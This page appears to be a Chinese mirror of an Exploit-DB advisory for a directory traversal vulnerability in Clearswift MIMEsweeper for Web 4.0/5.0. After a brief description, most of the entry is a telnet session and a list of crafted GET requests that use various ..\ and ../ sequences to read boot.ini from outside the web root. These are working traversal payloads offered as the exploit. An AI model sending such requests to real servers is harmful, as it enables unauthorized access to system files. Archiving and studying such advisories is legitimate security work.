clearswift MIMEsweeper for Web 4.0/5.0 – Directory Traversal

clearswift MIMEsweeper for Web 4.0/5.0 – Directory Traversal

漏洞ID 1054516 漏洞类型
发布时间 2004-07-11 更新时间 2004-07-11
图片[1]-clearswift MIMEsweeper for Web 4.0/5.0 – Directory Traversal-安全小百科CVE编号 N/A
图片[2]-clearswift MIMEsweeper for Web 4.0/5.0 – Directory Traversal-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24363
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10918/info

Clearswift MIMEsweeper For Web is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data.

To carry out an attack an attacker may specify a relative path to a target file in a GET request to the vulnerable server, directory traversal character sequences may be supplied as a part of the request to escape the web root.

telnet www.example.com 80
Trying www.example.com...
Connected to www.example.com.
Escape character is '^]'.
GET /ca/..\..\..\..\..\..\boot.ini HTTP/1.0

GET /foobar/..\..\..\..\boot.ini HTTP/1.0
GET /foobar/............\boot.ini HTTP/1.0
GET /foobar/............boot.ini HTTP/1.0
GET /foobar/..........boot.ini HTTP/1.0
GET /foobar//..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\..//..\..//boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar........boot.ini HTTP/1.0

相关推荐: Laforge Groups News51 Information Disclosure Vulnerability

Laforge Groups News51 Information Disclosure Vulnerability 漏洞ID 1099847 漏洞类型 Configuration Error 发布时间 2003-07-08 更新时间 2003-07-08 C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享